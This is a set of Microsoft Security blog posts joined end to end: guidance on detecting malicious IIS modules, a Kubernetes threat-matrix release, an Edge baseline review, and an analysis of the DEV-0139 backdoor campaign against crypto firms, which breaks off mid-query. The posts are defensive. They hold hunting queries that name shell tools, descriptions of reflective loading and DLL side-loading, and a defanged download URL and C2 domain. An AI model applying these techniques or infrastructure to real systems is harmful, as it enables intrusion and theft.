Microsoft Priva adds another layer of protection with privacy risk management, helping to identify data-privacy risks and automate mitigation wherever the data lives. To accommodate individuals making requests to review or manage their personal data about themselves, Microsoft Priva Subject Rights Requests includes the Microsoft Graph subject rights requests API. This powerful API helps your organization do more with less by automating searches across Microsoft Exchange, Microsoft OneDrive, SharePoint, or Teams.
And to protect the business-critical apps you rely on, Microsoft Defender for Cloud Apps helps you classify sensitive information using real-time controls that monitor data accessed across your multicloud environment. As a cloud access security broker (CASB), Defender for Cloud Apps blocks attacks against your apps using automated identity governance, and it integrates seamlessly with Microsoft Entra Permissions Management to root out and remediate permission risks.
Look for a built-in data protection solution
Any data-protection solution needs to address the four areas discussed—unified discovery and protection, protection against data exfiltration, control of unstructured data, and a foundation of Zero Trust—across hybrid and multicloud environments. Both Microsoft 365 and Microsoft Azure are purpose-built with Zero Trust as a core architectural principle. And with comprehensive, integrated solutions for information protection, data governance, risk management, and compliance, Microsoft Purview builds on all four pillars—so you can move forward, fearless.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
Web exploitation and web shells are some of the most common entry points in the current threat landscape. Web servers provide an external avenue directly into your corporate network, which often results in web servers being an initial intrusion vector or mechanism of persistence. Monitoring for exploitation and web shells should be a high priority for all networks, and while these detection techniques are targeted towards malicious IIS modules, a lot of these techniques will also provide general web shell detections.
IIS modules and the creation of persistent backdoors by malicious IIS modules has recently been addressed in the Microsoft Security blog titled Malicious IIS modules creating persistent backdoors. In this blog by Microsoft Detection and Response Team (DART), we aim to provide further guidance on detecting malicious IIS modules and other capabilities (such as logging) that you can use during your own investigations. While we will cover Microsoft Defender for Endpoint detections in this blog, these detection methods should be tool agnostic. The queries listed are not definitive detection queries, but rather a base query that you can build on to suit your specific environment.
A history of malicious IIS modules
The concept of malicious IIS has been around since at least 2013. Historical malware analysis shows how crimeware groups used IIS modules to intercept client logons and payment details by using the BeginRequest triggers to read user-provided parameters before the webserver processes them.
One of the first examples of sophisticated IIS modules was discovered in late 2021. The vendor’s ICEAPPLE report details an IIS module that was used by an actor to reflectively load further .NET modules, which by extension, loads further .NET capability. This allowed the actor to have minimal malicious indicators in the base IIS module, then load further capabilities as required.
A more recent example was provided in a recent Microsoft blog, where the actor instead opted for child process execution rather than loading the capability directly into w3wp.exe. This blog delves further into the capability to discuss the different capabilities that malicious IIS modules have access to.
Malicious IIS modules techniques
Event handlers
A core part of IIS module functionality is event handling. Event triggers provide opportunities for code to be called when specific actions happen. IIS modules have access to 27 event triggers by default, including:
Begin Request: When a request is received by the webserver.
End Request: When a response is about to be sent to the client.
Error: When an error happens.
Log Request: When a request is about to be logged.
Event handlers, which run when their associated trigger is fired, can allow an actor to essentially setup a proxy on the IIS server. By setting up an event handler on the BeginRequest, EndRequest, and Error event triggers, the actor can intercept all requests before the web service can process them and before the response is sent to the client.
Figure 1. Diagram showing how the malicious IIS module sits between the web server and the client
Event handlers are given full read and write access to the requests, which allows malicious IIS modules to hide web shell communications within any aspect on the web request, turning every page that does and does not exist into a web shell. This can include hiding web shell communications in the parameters, body, headers, or HTTP methods.
These aspects of malicious IIS modules make them very hard to detect in standard IIS logs. You cannot rely on usual web shell detection strategies, such as high frequency page requests or URI patterns. Malicious IIS modules instead require new detection techniques and use of advanced IIS logging.
Request and response tampering
An additional difficulty with malicious IIS modules is that they can tamper with any aspect of the request and/or response. This could include removing web shell commands from parameters or headers and preventing web shell commands from being logged.
IIS Modules can also intercept responses before they are sent, which presents the opportunity for an actor to serve malicious payloads into any response from the website, potentially infecting viewers of the website.
Process creation
‘W3wp.exe’, also known as IIS worker processes, is utilized by web applications that run within IIS. Process creation is the most common indication of a web shell on IIS servers. Monitoring for the creation of common shell tooling (cmd, PowerShell, rundll32, mshta) with the parent process w3wp.exe can help detect low-sophistication IIS modules.
This should not be considered a strong detection for IIS modules. With full integration with C# and the .NET framework, a large amount of functionality can be integrated to execute directly within the IIS process without relying on creating child processes.
.NET assembly loading
A common execution path for actors is to load .NET modules directly into memory through reflectively loading assemblies. This can allow common tools, such as SharpHound or the Potato PrivEsc family, to be loaded without being written to disk. This is also seen as a stealthier alternative to process creation because it’s within the context of w3wp.exe rather than within a child process.
Figure 2. SweetPotato named pipes being created from within w3wp.exe
As mentioned in the vendor paper earlier, assemblies can be provided arbitrarily to deliver additional functionality. This may be through providing the assembly through the web request or downloading the assembly from an actor-controlled C2. The figure below shows:
SharpHound being downloaded from an external C2 and loaded through the Reflection Assembly Load method.
Two methods being invoked within the binary and the output directory being set to ProgramData.
Figure 3. Example of an IIS module remotely downloading SharpHound and reflectively invoking it
With access to .NET, malicious actors can add additional layers of evasion to prevent detection of their IIS modules, such as encoding or encryption. In the figure below, we can see:
A base64 encoded blob and the size of the decoded assembly.
A new memory allocation is made, where the assembly is decoded and deflated into the new allocation.
The assembly is loaded and invoked, executing the command whoami.
Figure 4. Example of SweetPotato being reflectively loaded and invoked
Logging and monitoring
Advanced IIS Logs
IIS logs are a great place to start hunting for web shells, but advanced IIS logging is recommended because IIS modules can remove malicious traffic from the standard IIS logs. The IIS Service can provide additional advanced logging, such as the Microsoft IIS Configuration Operational log, which can be enabled through the event log tool by using the following commands:
Lists additional logs available for IIS: `wevtutil el | findstr -i IIS`
Configuration for the selected log: `wevtutil gl Microsoft-IIS-Configuration/Operational`
Enable the selected log: `wevtutil sl /e:true Microsoft-IIS-Configuration/Operational`
Figure 5. Example showing wevtutil querying the IIS Configuration Operational event log
The log that we will be focusing on in this blog is the Microsoft IIS Configuration Operational log. When enabled, the default path for this log is `C:\Windows\System32\winevt\Logs\Microsoft-IIS-Configuration%4Operational.evtx’ (shown in the figure above).
The Microsoft IIS Configuration Operational log captures the additional and removal of IIS modules (Event ID 29). IIS modules are not commonly added to a production IIS server, so alerting on this event ID should be enabled within your SIEM or security products.
Figure 6. Event ID 29 showing the IIS module ‘ProxyShell’ being added to the default website
Note: This IIS module has no correlation with the Exchange Vulnerability ProxyShell.
Figure 7. Event ID 29 showing the IIS module ‘ProxyShell’ being removed from the default website
IIS module listing
IIS modules can be installed at a global level or at a site level. In detecting malicious IIS modules, it is important to check both the global and site level for unauthorized modules. Regular monitoring of these locations for such modules and comparing against a known good list can help detect and identify malicious IIS modules. Appcmd (path: %windir%\system32\inetsrv\appcmd.exe), a command line tool for managing your IIS servers, can be used to that purpose. The command ‘appcmd list modules’ will list global IIS modules on your server. The command ‘appcmd list modules /app.name:<appName>/’ will let you search specific websites.
Figure 8. Appcmd listing the modules for Default Web Site and showing two malicious modules: “ProxyShell” and “Malicious IIS Module”
Modules listed through appcmd will be ordered based on the order of installation. In Figure 9, the two malicious IIS modules, ProxyShell and Malicious IIS Module, were the two most recent IIS modules installed and therefore the last two on the list. The type parameter also shows the class that is called when the module is loaded.
Web.config
The web.config file, which details the settings for a website, can include modules that the website loads and should therefore be monitored when detecting malicious IIS modules. Monitoring of web.config should primarily focus on tracking modifications to the file, and can be done through multiple tools and sources. For example, the Microsoft IIS Configuration Operational event log produces Event ID 50 when a modification is made to a website. Because the content of the modification is not captured, a backup of the web.config should be stored for easy comparison between the modified file and the original.
Figure 9. Event ID 50 showing that a modification has been made to default website
Most EDRs capture file modification events as well. Enabling an alert for the modification of web.config, especially from the w3wp.exe process, will enable detection of unwarranted changes to the config.
Hunting for malicious IIS modules
IIS module loading
While loaded IIS modules are standardly loaded DLLs, not all tools list .NET modules that are loaded into w3wp.exe. One tool that does show IIS modules loaded into w3wp.exe is Process Hacker, which if used with administrative privileges, will show them under the Modules tab.
Figure 10. Malicious ProxyShell IIS module loaded within the w3wp.exe process
In Microsoft Defender for Endpoint, an IIS module that is loaded into w3wp.exe will appear twice: First when loaded from the bin directory from which it resides, then immediately after from the temporary ASP.NET directory.
Figure 11. Malicious IIS module ProxyShell being listed in Defender for Endpoint
By default, IIS modules are loaded when the w3wp.exe process is created. If an IIS module is loaded while the w3wp.exe process is already executing and at a different time than the rest of the module, it can be an indicator for malicious IIS module loading. Monitoring for abnormal module loads may help detect malicious IIS modules. Using a query like the KQL one below can group together modules loaded into w3wp.exe at the same second. In Figure 12, we can see a large number of modules being loaded within a three second time period, followed by the malicious ProxyShell IIS module three hours later.
DeviceImageLoadEvents
| where InitiatingProcessFileName has "w3wp.exe"
| summarize loaded_modules=make_set(FileName) by format_datetime(Timestamp, 'yy-MM-dd HH:mm:ss')
| project Timestamp, loaded_modules, count=array_length(loaded_modules)
Figure 12. Anomalous module loading based on timeframe of other IIS modules
Assembly loading
While IIS modules have the capability to load .NET modules arbitrarily and reflectively within the context of w3wp.exe, the AppDomains are still registered within the hosting process. By listing AppDomain loaded within an assembly through a tool like Process Hacker, you’ll be able to find the loaded IIS module and any .NET modules that have been loaded.
In the figure above, the malicious IIS module ProxyShell can be seen alongside the loaded assemblies SharpHound and SweetPotato. Another thing to note is that reflectively loaded modules usually do not have Flags: in Figure 13, all the assemblies without Flags are either loaded through the malicious IIS module or through Visual Studio debugging.
The ETW provider Microsoft-Windows-DotNETRuntimeRundown provides a snapshot in time of the loaded .NET modules within active processes. Two events can help detect malicious assemblies loaded within IIS:
Event ID 151 lists loaded AppDomains.
Event ID 155 enumerates assemblies loaded at the time of the rundown.
The ModuleILPath field shows the path of the loaded assembly; however, if this assembly is loaded reflectively, rather than a path to the file, it will instead just list the name of the assembly. The figure below shows how SharpHound and SweetPotato, both with reflectively loaded assemblies, do not have paths while other events do.
Figure 14. Example of reflectively loaded assemblies not having a file path within the ModuleILPath field
The Assembly Flags field may also be 0, similar to Figure 13 where Process Hacker shows empty Flags for the assemblies.
Figure 15. Example of empty assembly flags for .NET rundown
IIS module installation
Processes which contain appcmd or gacutil within the command line and the parent process w3wp.exe should be investigated for potential installation of malicious IIS modules. The following Defender for Endpoint queries can help detect such malicious IIS module installation:
DeviceProcessEvents
| where ProcessCommandLine has "appcmd.exe add module"
| where InitiatingProcessParentFileName == "w3wp.exe"
DeviceProcessEvents
|where ProcessCommandLine has "\\gacutil.exe /I"
| where InitiatingProcessParentFileName == "w3wp.exe"
Process creation
Process creation events with the parent process of w3wp.exe should be monitored for abnormal child processes. For IIS servers that require child processes of w3wp.exe, ignore lists should be created for these child processes to prevent false flags.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ('w3wp.exe', 'httpd.exe')
| where FileName in~ ('cmd.exe', 'powershell.exe', 'cscript.exe', 'wscript.exe', 'net.exe', 'net1.exe', 'ping.exe', 'whoami.exe')
| summarize instances = count() by ProcessCommandLine, FolderPath, DeviceName, DeviceId
| order by instances asc
If one of the Potato-sploits are being used to create processes, the AccountName field may also be “System” while the InitiatingProcessAccountName will be the Application Pool.
Conclusion
Threat actors use a variety of techniques to conceal their activity when using malicious IIS modules. Enabling additional logging in your environment is recommended to facilitate the detection of these harmful modules. Specifically, IIS servers should enable the optional event log Microsoft IIS Configuration Operational. This log can provide insight into IIS modules being added or removed from the IIS server and track any modifications made to web.config.
IIS Servers should have their web.config and IIS modules monitored for malicious modifications being made. For example, Gacutil.exe and appcmd.exe being executed from w3wp.exe should be monitored for potential installation of IIS modules. Additionally, the bin directories of websites and the default GAC path should be monitored and regularly scanned for malicious modules being created.
Hunting for malicious IIS modules can be performed through Microsoft Defender for Endpoint or your EDR of choice, and it should be conducted regularly to detect abnormal w3wp.exe interactions. This can include, but is not limited to, process creation, file creation and named pipe creation. Due to the wide flexibility around how IIS modules can execute malicious code, it’s important to look for irregularities in behavior.
Detecting web exploitation and malicious IIS modules should be a priority for all organizations, and Microsoft DART believes that following the recommendations provided in this blog and along with the monitoring and detection strategies will assist your organization in the detection and response of these threats.
Today, we are glad to release the third version of the threat matrix for Kubernetes, an evolving knowledge base for security threats that target Kubernetes clusters. The matrix, first released by Microsoft in 2020, was the first attempt to systematically cover the attack landscape of Kubernetes. Since then, the project has received great attention and interest from the Kubernetes security community and was updated last year to keep up with the evolving threat landscape. The latest version of the matrix comes in a new format that simplifies usage of the knowledge base and with new content to help mitigate threats. The new matrix is available at: http://aka.ms/KubernetesThreatMatrix.
What’s new
Mitigations methods
Understanding the attack surface of containerized environments is the first step of building security solutions for these environments. In addition to helping organizations measure and assess coverage of threats with matching detections, the updated threat matrix for Kubernetes can now also help organizations with a systematic approach to apply mitigation techniques that prevent attacks from being successfully launched.
In this third version of the threat matrix, we introduce a collection of mitigations specific to Kubernetes environments and associate each with relevant threat techniques. Those mitigations, as displayed below in Figure 1, provide practical tools to prevent the various attack techniques, using built-in Kubernetes and cloud tools.
Figure 1. A technique page with a mitigation section
When reviewing the different threat techniques in the matrix, a list of relevant mitigations is provided so that organizations can see if they are taking all the necessary steps to prevent a threat. Additionally, when looking at a specific mitigation, a list of relevant threat techniques is displayed and can help organizations prioritize their mitigation implementation plan according to their threat assessment and detection coverage in each area.
Mapping to MITRE ATT&CK techniques
Last year, MITRE added a container matrix to the MITRE ATT&CK framework. MITRE ATT&CK for containers matrix, inspired by Microsoft threat matrix for Kubernetes, is a result of a joint effort between MITRE, Microsoft, and additional companies in the industry. The differences between Microsoft’s and MITRE’s matrices are described in this blog. In the new version of the Microsoft threat matrix for Kubernetes, we include a mapping between the Microsoft matrix and MITRE ATT&CK techniques and mitigations, as displayed below in Figure 2. This can help organizations to efficiently use the two frameworks.
Figure 2. Mapping to MITRE ATT&CK techniques
MITRE ATT&CK matrix for containers does not have an equivalent technique for each of the techniques in the Microsoft threat matrix for Kubernetes. When there is no equivalent technique in the MITRE matrix, the Microsoft techniques might be mapped to a MITRE technique that is not part of MITRE’s containers matrix but shares the same principle. For example, the Backdoor Container (MS-TA9012) technique explains that attackers can use Kubernetes controllers (such as daemonsets) to run their code and survive reboots of the pods\nodes. This is very similar to MITRE’s Create or Modify System Process technique (T1543), which is about using services\daemons for the exact same purpose. Another example is the mapping between Malicious Admission Controller (MS-TA9015) and MITRE’s Event Triggered Execution. Although MITRE doesn’t talk about containerized environment, those two techniques share the same idea. In cases when there is no matching MITRE technique with the same principle, the Microsoft technique will not point back to a MITRE technique.
New techniques
The new version of the matrix also introduces two new techniques and additional re-categorization of existing techniques:
New technique: Static pods
A persistence technique which allows attackers to deploy pods that aren’t managed by the Kubernetes API server.
New technique: Collecting data from pod
Kubernetes-native technique which allows attackers to extract data from running pods.
Extending existing technique: Container service account
Attackers may create new service accounts or steal tokens of existing service accounts for future use from inside and outside the cluster. Therefore, we also added this technique to the persistence tactic.
Attackers may use management interfaces for discovery purposes, after gaining initial access to the cluster. By using the network reachability between pods, attackers can connect to management interfaces from the internal network, allowing them to get valuable information about the workload. Thus, we also added this technique to the discovery tactic.
Figure 3. New techniques and re-categorization of existing techniques
New web interface
As new threats were added to the Kubernetes matrix and additional content was introduced, it became increasingly harder to effectively deliver the breadth of information included in the matrix as a blog post. Looking for ways to make it easier to use the Kubernetes threats and mitigations matrix as reference material for day-to-day security operations, we are releasing the matrix as a web site, shown in Figure 4 below.
Figure 4. The new interface of the threat matrix for Kubernetes
The threat matrix for Kubernetes can help organizations to have visibility to the unique attack surface of Kubernetes and help them to measure their coverage to those threats. With the new mitigation section, organizations can now understand the measures required to prevent those threats.
Microsoft Defender for Cloud can help detect and mitigate threats in your Kubernetes environments. Learn more about Microsoft Defender for Cloud support for container security.
We are pleased to announce the security review for Microsoft Edge, version 108!
We have reviewed the new settings in Microsoft Edge version 108 and determined that there are no additional security settings that require enforcement, however there is one setting that attention should be given to. The Microsoft Edge version 107 security baseline continues to be our recommended configuration which can be downloaded from the Microsoft Security Compliance Toolkit.
TLS Encrypted ClientHello Enabled (Consider)
An interesting setting Admin’s may wish to consider, particularly if using Windows Defender Network Protection or similar security software. TLS Encryped ClientHello (ECH) Enabled is a privacy-improving feature that combats one of the shortcomings of HTTPS – namely, TLS does not hide from a network observer the target hostname to which the browser is connecting. This means that your company or ISP network administrator (or anyone who can spy on network traffic) can see the hostname of the site to which your browser is connecting, which has privacy implications. ECH hides the hostname so that a network observer can only see the target IP address of browser traffic, but not which specific site at that IP is being requested.
The reason that this feature has a security impact is that some security software may be spying upon your network requests and blocking requests to specific sites based on the site’s hostname. As a specific example, the Windows Defender Network Protection feature relies upon looking at the Server Name Indication (SNI) within the ClientHello to decide whether to block traffic to sites on the “known malicious” list or the customer’s custom blocklist. If the ClientHello is encrypted by the browser’s new ECH, this Network Protection feature (and similar features in other security software) will not be able to read the SNI, and thus will not be able to block the traffic.
For Microsoft Edge specifically, there’s a subtlety around the interaction of ECH and Network Protection. Machine installed channels of Edge (Stable/Beta) are exempted from Network Protection (in favor of Microsoft Defender SmartScreen), so the implications of this policy on Microsoft Edge are really limited to Edge Canary OR users of non-Microsoft Defender security products. But IT departments using Network Protection in Google Chrome really should set the equivalent policy.
Microsoft Edge version 108 introduced 4 new computer settings and 4 new user settings. We have included a spreadsheet listing the new settings in the release to make it easier for you to find them.
As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.
Over the past several years, the cryptocurrency market has considerably expanded, gaining the interest of investors and threat actors. Cryptocurrency itself has been used by cybercriminals for their operations, notably for ransom payment in ransomware attacks, but we have also observed threat actors directly targeting organizations within the cryptocurrency industry for financial gain. Attacks targeting this market have taken many forms, including fraud, vulnerability exploitation, fake applications, and usage of info stealers, as attackers attempt to get their hands on cryptocurrency funds.
We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.
Figure 1. Overview of the attack
Further investigation through our telemetry led to the discovery of another file that uses the same DLL proxying technique. But instead of a malicious Excel file, it is delivered in an MSI package for a CryptoDashboardV2 application, dated June 2022. This may suggest other related campaigns are also run by the same threat actor, using the same techniques.
In this blog post, we will present the details uncovered from our investigation of the attack against a cryptocurrency investment company, as well as analysis of related files, to help similar organizations understand this kind of threat, and prepare for possible attacks. Researchers at Volexity recently published their findings on this attack as well.
As with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.
Initial compromise
To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram. In the specific attack, DEV-0139 got in touch with their target on October 19, 2022 by creating a secondary Telegram group with the name <NameOfTheTargetedCompany> <> OKX Fee Adjustment and inviting three employees. The threat actor created fake profiles using details from employees of the company OKX. The screenshot below shows the real accounts and the malicious ones for two of the users present in the group.
Figure 2. Legitimate profiles of cryptocurrency exchange employees (left) and fake profiles created by the threat actor (right)
It’s worth noting that the threat actor appears to have a broad knowledge of the cryptocurrency industry and the challenges the targeted company may face. The threat actor asked questions about fee structures, which are the fees used by crypto exchange platforms for trading. The fees are a big challenge for investment funds as they represent a cost and must be optimized to minimize impact on margin and profits. Like many other companies in this industry, the largest costs come from fees charged by exchanges. This is a very specific topic that demonstrates how the threat actor was advanced and well prepared before contacting their target.
After gaining the trust of the target, the threat actor sent a weaponized Excel document to the target containing further details on the fees to appear legitimate. The threat actor used the fee structure discussion as an opportunity to ask the target to open the weaponized Excel file and fill in their information.
Weaponized Excel file analysis
The weaponized Excel file, which has the file name OKX Binance & Huobi VIP fee comparision.xls (Sha256: abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0), is well crafted and contains legitimate information about the current fees used by some crypto exchanges. The metadata extracted showed that the file was created by the user Wolf:
File name
OKX Binance & Huobi VIP fee comparision.xls
CompObjUserTypeLen
31
CompObjUserType
Microsoft Excel 2003 Worksheet
ModifyDate
2022:10:14 02:34:33
TitleOfParts
Comparison_Oct 2022
SharedDoc
No
Author
Wolf
CodePage
Windows Latin 1 (Western European)
AppVersion
16
LinksUpToDate
No
ScaleCrop
No
LastModifiedBy
Wolf
HeadingPairs
Worksheets, 1
FileType
XLS
FileTypeExtension
xls
HyperlinksChanged
No
Security
None
CreateDate
2022:10:14 02:34:31
Software
Microsoft Excel
MIMEType
application/vnd.ms-excel
Figure 3. The information in the malicious Excel file
The macro is obfuscated and abuses UserForm (a feature used to create windows) to store data and variables. In this case, the name of the UserForm is IFUZYDTTOP, and the macro retrieves the information with the following code IFUZYDTTOP.MgQnQVGb.Caption where MgQnQVGb is the name of the label in the UserForm and .caption allows to retrieve the information stored into the UserForm.
The table below shows the data retrieved from the UserForm:
The macro retrieves some parameters from the UserForm as well as another XLS file stored in base64. The XLS file is dropped into the directory C:\ProgramData\Microsoft Media as VSDB688.tmp and runs in invisible mode.
Figure 4. The deobfuscated code to load the extracted worksheet in invisible mode.
Additionally, the main sheet in the Excel file is protected with the password dragon to encourage the target to enable the macros. The sheet is then unprotected after installing and running the other Excel file stored in Base64. This is likely used to trick the user to enable macros and not raise suspicion.
Extracted worksheet
The second Excel file, VSDB688.tmp (Sha256: a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9), is used to retrieve a PNG file that is parsed later by the macro to extract two executable files and the encrypted backdoor. Below is the metadata for the second worksheet:
File Name
VSDB688.tmp
CompObjUserType
Microsoft Excel 2003 Worksheet
ModifyDate
2022:08:29 08:07:24
TitleOfParts
Sheet1
SharedDoc
No
CodePage
Windows Latin 1 (Western European)
AppVersion
16
LinksUpToDate
No
ScaleCrop
No
CompObjUserTypeLen
31
HeadingPairs
Worksheets, 1
FileType
XLS
FileTypeExtension
xls
HyperlinksChanged
No
Security
None
CreateDate
2006:09:16 00:00:00
Software
Microsoft Excel
MIMEType
application/vnd.ms-excel
Figure 5. The second file is completely empty but contains the same UserForm abuse technique as the first stage.
The table below shows the deobfuscated data retrieved from the UserForm:
The macro retrieves some parameters from the UserForm then downloads a PNG file from hxxps://od.lk/d/d021d412be456a6f78a0052a1f0e3557dcfa14bf25f9d0f1d0d2d7dcdac86c73/Background.png. The file was no longer available at the time of analysis, indicating that the threat actor likely deployed it only for this specific attack.
Figure 6. Deobfuscated code that shows the download of the file Background.png
The PNG is then split into three parts and written in three different files: the legitimate file logagent.exe, a malicious version of wsock32.dll, and the XOR encrypted backdoor with the GUID (56762eb9-411c-4842-9530-9922c46ba2da). The three files are used to load the main payload to the target system.
Figure 7. The three files are written into C:\\ProgramData\SoftwareCache\ and run using the CreateProcess API
Loader analysis
Two of the three files extracted from the PNG file, logagent.exe and wsock32.dll, are used to load the XOR encrypted backdoor. The following sections present our in-depth analysis of both files.
Logagent.exe
Logagent.exe (Hash: 8400f2674892cdfff27b0dfe98a2a77673ce5e76b06438ac6110f0d768459942) is a legitimate system application used to log errors from Windows Media Player and send the information for troubleshooting.
The file contains the following metadata, but it is not signed:
The logagent.exe imports function from the wsock32.dll which is abused by the threat actor to load malicious code into the targeted system. To trigger and run the malicious wsock32.dll, logagent.exe is run with the following arguments previously retrieved by the macro: 56762eb9-411c-4842-9530-9922c46ba2da /shadow. Both arguments are then retrieved by wsock32.dll. The GUID 56762eb9-411c-4842-9530-9922c46ba2da is the filename for the malicious wsock32.dll to load and /shadow is used as an XOR key to decrypt it. Both parameters are needed for the malware to function, potentially hindering isolated analysis.
Figure 8. Command line execution from the running process logagent.exe
Wsock32.dll
The legitimate wsock32.dll is the Windows Socket API used by applications to handle network connections. In this attack, the threat actor used a malicious version of wsock32.dll to evade detection. The malicious wsock32.dll is loaded by logagent.exe through DLL side-loading and uses DLL proxying to call the legitimate functions from the real wsock32.dll and avoid detection. DLL proxying is a hijacking technique where a malicious DLL sits in between the application calling the exported function and a legitimate DLL that implements that exported function. In this attack, the malicious wsock32.dll acts as a proxy between logagent.exe and the legitimate wsock32.dll.
It is possible to notice that the DLL is forwarding the call to the legitimate functions by looking at the import address table:
Figure 9. Import Address Table from wsock32.dllFigure 10. Retrieving data with PeStudio revealed the original file name for the malicious wsock32.dll.
When the malicious wsock32.dll is loaded, it first retrieves the command line, and checks if the file with the GUID as a filename is present in the same directory using the CreateFile API to retrieve a file handle.
Figure 11. Verification of the presence of the file 56762eb9-411c-4842-9530-9922c46ba2da for decryption
The malicious wsock32.dll loads and decodes the final implant into the memory with the GUID name which is used to remote access the infected machine.
Once the file is loaded into the memory, it gives remote access to the threat actor. At the time of the analysis, we could not retrieve the final payload. However, we identified another variant of this attack and retrieved the payload, which is discussed in the next section. Identified implants were connecting back to the same command-and-control (C2) server.
Related attack
We identified another file using a similar mechanism as logagent.exe and delivering the same payload. The loader is packaged as an MSI package and as posed an application called CryptoDashboardV2 (Hash: e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487). After installing the MSI, it uses a legitimate application called tplink.exe to sideload the malicious DLL called DUser.dll and uses DLL proxying as well.
creation datetime
11/12/2009 11:47
author
168 Trading
title
Installation Database
page count
200
word count
2
keywords
Installer, MSI, Database
last saved
11/12/2009 11:47
revision number
{30CD8B94-5D3C-4B55-A5A3-3FC9C7CCE6D5}
last printed
11/12/2009 11:47
application name
Advanced Installer 14.5.2 build 83143
subject
CryptoDashboardV2
template
x64;1033
code page
Latin I
comments
This installer database contains the logic and data required to install CryptoDashboardV2.
Figure 12. Installation details of the MSI file
Once the package is installed, it runs and side-loads the DLL using the following command: C:\Users\user\AppData\Roaming\Dashboard_v2\TPLink.exe” 27E57D84-4310-4825-AB22-743C78B8F3AA /sven, where it noticeably uses a different GUID.
Further analysis of the malicious DUser.dll showed that its original name is also HijackingLib.dll, same as the malicious wsock32.dll. This could indicate the usage of the same tool to create these malicious DLL proxies. Below are the file details of DUser.dll:
Once the DLL is running, it loads and decodes the implant in the memory and starts beaconing the same domain. In that case, the implant is using the GUID name 27E57D84-4310-4825-AB22-743C78B8F3AA and the XOR key /sven.
Implant analysis
The payload decoded in the memory by the malicious DLL is an implant used by the threat actor to remotely access the compromised machine. We were able to get the one from the second variant we uncovered. Below are the details of the payload:
First, the sample retrieves some information from the targeted system. It can connect back to a remote server and receive commands from it.
Figure 13. Details about the connection to the C2.Figure 14. The sample is connecting back to the domain name strainservice[.]com.
Infrastructure
It is interesting to notice that the threat actor abused OpenDrive in one of the variants to deliver the payload. The OpenDrive account has been set up quickly for a one shot, indicating that it was created for only one target.
We identified one domain used as C2 server, strainservice[.]com and connected back to the two implants. This domain was registered on June 26 on Namecheap, just before the distribution of the first variant. At the time of the attack, the server had port 80, 443, and 2083. The implants were communicated on port 443.
Defending against targeted attacks
In this report we analyzed a targeted attack on cryptocurrency investment fund startups. Such companies are relatively new, but manage hundreds of millions of dollars, raising interest by threat actors.
In this attack we identified that the threat actor has broad knowledge of the cryptocurrency industry as well as the challenges their targets may face, increasing the sophistication of the attack and their chance of success. The threat actor used Telegram, an app widely used in the field, to identify the profile of interest, gained the target’s trust by discussing relevant topics, and finally sent a weaponized document that delivered a backdoor through multiple mechanisms. Additionally, the second attack identified was luring a fake crypto dashboard application.
The cryptocurrency market remains a field of interest for threat actors. Targeted users are identified through trusted channels to increase the chance of success. While the biggest companies can be targeted, smaller companies can also be targets of interest. The techniques used by the actor covered in this blog can be mitigated by adopting the security considerations provided below:
Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
Educate end users about protecting personal and business information in social media, filtering unsolicited communication (in this case, Telegram chat groups), identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.
Educate end users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent via instant messaging applications or social networks. Encourage end users to practice good credential hygiene and make sure the Microsoft Defender Firewall (which is enabled by default) is always on to prevent malware infection and stifle propagation.
Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.
Query that looks for Office apps that create a file within an uncommon directory (less that five occurrences), makes a set of each machine this is seen on, and each user that has executed it to help look for how many users/hosts are compromised:
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook", "powerpnt")
| where ActionType == "FileCreated"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize PathCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, Path, InitiatingProcessFileName, SHA256
| where PathCount < 5
Query that summarizes child process of Office apps, looking for less than five occurrences:
DeviceProcessEvents
